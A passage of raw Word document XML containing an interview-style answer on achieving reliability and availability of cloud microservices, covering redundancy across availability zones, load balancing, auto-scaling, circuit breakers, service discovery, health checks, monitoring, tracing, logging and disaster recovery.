      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:pict w14:anchorId="182D2D51">
          <v:rect id="_x0000_i7527" style="width:0;height:1.5pt" o:hralign="center" o:bullet="t" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D466A04" w14:textId="77777777" w:rsidR="00AF4871" w:rsidRPr="00CE4B95" w:rsidRDefault="00AF4871" w:rsidP="001659D4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1A02EDAA" w14:textId="77777777" w:rsidR="00AF4871" w:rsidRPr="00CE4B95" w:rsidRDefault="00AF4871" w:rsidP="001659D4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="59344FE4" w14:textId="77777777" w:rsidR="000B09B5" w:rsidRPr="00CE4B95" w:rsidRDefault="000B09B5" w:rsidP="000B09B5">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="740" w:name="_Toc197867954"/>
      <w:r w:rsidRPr="000B09B5">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>How can we achieve reliability and availability of microservices in the cloud</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="740"/>
    </w:p>
    <w:p w14:paraId="46E9B2DF" w14:textId="77777777" w:rsidR="000B09B5" w:rsidRPr="00FB6F10" w:rsidRDefault="000B09B5" w:rsidP="000B09B5">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Achieving reliability and availability of microservices in the cloud requires implementing a combination of design patterns, best practices, and cloud-native tools to ensure that services remain resilient, fault-tolerant, and always accessible. Below are several strategies to achieve this:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E7FF51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Redundancy and Replication</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DE9882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ploy Across Multiple Availability Zones (AZs)</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve">: Most cloud providers, such as AWS, Azure, and Google Cloud, offer multiple </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>Availability Zones</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> within a region. Distributing your microservices across </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>multiple AZs</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> helps ensure that if one zone experiences an issue, other zones can handle the traffic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63185CF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plicate Services and Databases</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve">: To prevent service disruption, </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>replicate microservice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atabases</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> across multiple locations. Use managed services with </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>automatic replication</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> (e.g., AWS RDS, Azure SQL Database).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38B336B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Load Balancing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E45D84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Horizontal Scaling</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>: Microservices can be horizontally scaled across multiple instances. This ensures that if a service instance goes down, another instance can handle the incoming requests.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6887DE0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loud Load Balancers</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cloud load balancers</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> (e.g., AWS ELB, Azure Load Balancer, Google Cloud Load Balancer) to distribute incoming traffic across multiple instances of microservices. This ensures no single point of failure and improves </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>availability</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F5EC85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Auto-scaling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32391BE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ynamic Scaling</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve">: Cloud platforms support </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>auto-scaling</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> features (e.g., AWS Auto Scaling, Azure VM Scale Sets) that automatically scale microservices based on load. This helps maintain performance during traffic spikes while saving costs during low-traffic periods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53F06CB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scaling based on metrics</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>: Define auto-scaling policies based on CPU usage, memory, or custom application metrics (like request count or error rate).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4988B09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Circuit Breaker Pattern</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BEB0BC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event Cascading Failure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circuit breakers</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> (e.g., using libraries like </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>Resilience4j</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Hystrix</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>) to avoid cascading failures. When a microservice is experiencing issues, the circuit breaker prevents further requests from reaching it and gives it time to recover.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="232F043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allback Mechanisms</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve">: Provide </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>fallback responses</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> or degrade the service gracefully when the circuit breaker is open.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DC0A929"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Service Discovery and Dynamic Routing</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4326702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utomatic Service Discovery</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xml:space="preserve"> tools like </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>Consul</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Eureka</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Kubernetes DNS</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> to automatically detect and connect to microservices, ensuring that requests are routed to healthy instances.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34AA1F8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ynamic Routing</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve">: Use an </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>API Gateway</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> (e.g., AWS API Gateway, Kong) or </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>service mesh</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> (e.g., Istio) to route traffic dynamically to the right instances based on their health, version, or other routing rules.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D87515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Health Checks and Monitoring</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B480FE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Health Check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health checks</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> (e.g., /health endpoints) to monitor the health of each microservice. Cloud platforms provide tools to configure </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>automatic health checks</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> that ensure only healthy instances of microservices receive traffic.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2698069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Monitoring</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve">: Use cloud-native monitoring tools like </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>AWS CloudWatc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Operations Suite</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Azure Monitor</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> to track the performance, availability, and health of services. Monitor critical metrics like CPU usage, memory consumption, and error rates to identify issues proactively.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31417C4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Distributed Tracing and Logging</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3848F30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tributed Tracing</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve">: Use tools like </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>AWS X-Ra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Trace</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Jaeger</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> to trace requests as they pass through multiple microservices. This helps identify bottlenecks and failure points in the system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61A0217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entralized Logging</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve">: Use centralized logging systems like </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>AWS CloudWatch Log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ELK stack</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Elasticsearch, Logstash, Kibana), or </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>Splunk</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> to aggregate logs from all microservices. This allows you to troubleshoot issues faster and gain visibility into service behavior.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5730CED6"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Failover and Disaster Recovery</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="067BC43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ackup and Restore</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve">: Ensure that all critical data is backed up regularly. Use cloud-native services that offer </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>automatic backups</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> (e.g., Amazon RDS snapshots, Azure Database backup).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5522DE4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isaster Recovery Plan</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve">: Design a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xml:space="preserve"> plan that includes the ability to failover to another region or availability zone. Ensure that services can recover from data center outages quickly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35B6060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eographic Redundancy</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve">: Deploy critical microservices across multiple </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t>regions</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve"> to ensure that your services are available even if an entire region goes down.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2312629C"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Event-Driven Architecture</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="135DBE4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Decouple Services with Event-Driven Design</w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:lang w:bidi="ar-SA"/>
        </w:rPr>
        <w:t xml:space="preserve">: Use </w:t>
      </w:r>
      <w:r w:rsidRPr="00FB6F10">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
